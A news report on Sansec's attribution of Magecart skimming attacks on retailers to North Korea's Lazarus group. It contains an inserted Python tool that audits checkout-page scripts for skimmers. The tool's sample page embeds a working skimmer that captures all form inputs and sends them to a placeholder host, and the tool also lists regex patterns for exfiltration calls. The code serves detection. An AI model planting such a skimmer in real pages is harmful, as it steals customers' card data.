The North Korean state-sponsored Lazarus or Hidden Cobra advanced persistent threat (APT) group is almost certainly behind a spate of recent cyber attacks that saw the websites of multiple retailers, including Claire’s Accessories, compromised with the Magecart credit card skimmer, according to Sansec researcher Willem de Groot, who has been tracking the group.
North Korean APTs have previously tended to restrict their activity to financial services companies and South Korean cryptocurrency markets, but Sansec found that they have pivoted to targeting retail consumers in the US and Europe in a campaign that has been running for over 12 months.
De Groot told Computer Weekly it was likely that the activity was largely financially motivated – obtaining hard currency is suspected to be the prime motivation behind much of the threat activity originating from within the isolated, secretive and impoverished country.
De Groot said that with cards and CVV codes selling for between $5 and $30 on dark web forums, using Magecart could be a goldmine for the group.
This new discovery also marks something of a sea change for use of Magecart, which has traditionally been dominated by Russian and Indonesian hacking groups.
Sansec said Hidden Cobra probably gained access to the retailers' store code through spearphishing attacks aimed at obtaining staff passwords. Once inside, the attackers injected the malicious Magecart script into the store checkout page, where the skimmer collected data entered by customers, such as credit card numbers, and exfiltrated it to their server.
De Groot said his team was able to attribute the activity to Hidden Cobra because the attacks were using infrastructure from previous operations to exfiltrate the data.
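The two observations above, a skimmer injected into the checkout page and exfiltration to hosts reused from earlier operations, both surface as deviations from a page's expected script inventory. The following is an added example, not Sansec's tooling or code from the article: it inventories the external and inline scripts on a checkout page, flags script hosts outside a constructed allowlist, and flags inline scripts that both read form fields and send data out of the page. The sample HTML, the allowlist and the hostnames in it are all constructed for illustration.

```python
"""Audit a checkout page's script inventory for Magecart-style injections.

Added example, not the article's or Sansec's own code. The allowlist and the
sample page below are constructed; the hostnames are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline: hosts this store expects to serve scripts on checkout.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.payments.example"}

# A skimmer has to do two things: read what the customer typed, and ship it out.
READS_FORM_DATA = re.compile(
    r"getElementsByTagName\(['\"]input['\"]\)|querySelectorAll\(['\"]input|\.value\b")
SENDS_DATA_OUT = re.compile(
    r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(\)|\.src\s*=")
HOST_IN_SCRIPT = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding_kind, detail) pairs for anything outside the baseline."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative (first-party) paths
        if host and host not in allowed_hosts:
            findings.append(("unexpected-script-host", host))
    for idx, body in enumerate(parser.inline, 1):
        for host in sorted(set(HOST_IN_SCRIPT.findall(body))):
            if host not in allowed_hosts:
                findings.append(("unexpected-host-in-inline-script", host))
        if READS_FORM_DATA.search(body) and SENDS_DATA_OUT.search(body):
            findings.append(("skimmer-like-inline-script", f"inline script {idx}"))
    return findings


# Constructed sample: a checkout page with one injected loader and one inline skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="/static/app.js"></script>
<script src="//static.hijacked-bookshop.example/jquery.min.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var inputs = document.getElementsByTagName("input"), out = {};
    for (var i = 0; i < inputs.length; i++) out[inputs[i].name] = inputs[i].value;
    new Image().src = "https://static.hijacked-bookshop.example/i.gif?d=" + btoa(JSON.stringify(out));
  });
</script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{kind}: {detail}")
```

Run against a stored copy of the live checkout page on a schedule, the host findings are the part that catches infrastructure reuse: a hijacked third-party site that appears in one store's exfiltration path will show up again as the same unexpected host on the next victim, which is the kind of overlap the attribution here rests on.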
The global exfiltration network used by Hidden Cobra is exploiting legitimate sites that have been hijacked and repurposed, which include a Milan-based modelling agency, a vintage music store in Tehran, and an independent bookshop in New Jersey.
The use of these sites was first uncovered in June 2019, and Sansec has been tracking the campaign since then thanks to some unique identifying characteristics and distinctive patterns in the skimmer’s code, more technical details of which can be read in De Groot’s disclosure blog.
The use of shared infrastructure or noteworthy quirks in code is quite common in Magecart attacks – Sansec typically finds between 30 and 100 infected online stores every day, so it has a fair amount of expertise in this regard. Often, these indicators are quite obvious; for example, one recent Indonesian-run campaign used a distinctive debug message, “Success bro”. In this case, the indicators were rather more subtle.
While De Groot said it was possible that different actors might have simultaneous control over the network of hijacked sites, this was quite unlikely in practice, not least because once a site has been hacked, it is common practice to close off the exploited vulnerability to stop rivals from getting access to the new asset.
It is this that has allowed Sansec to link this spate of attacks to Hidden Cobra with a fair degree of confidence.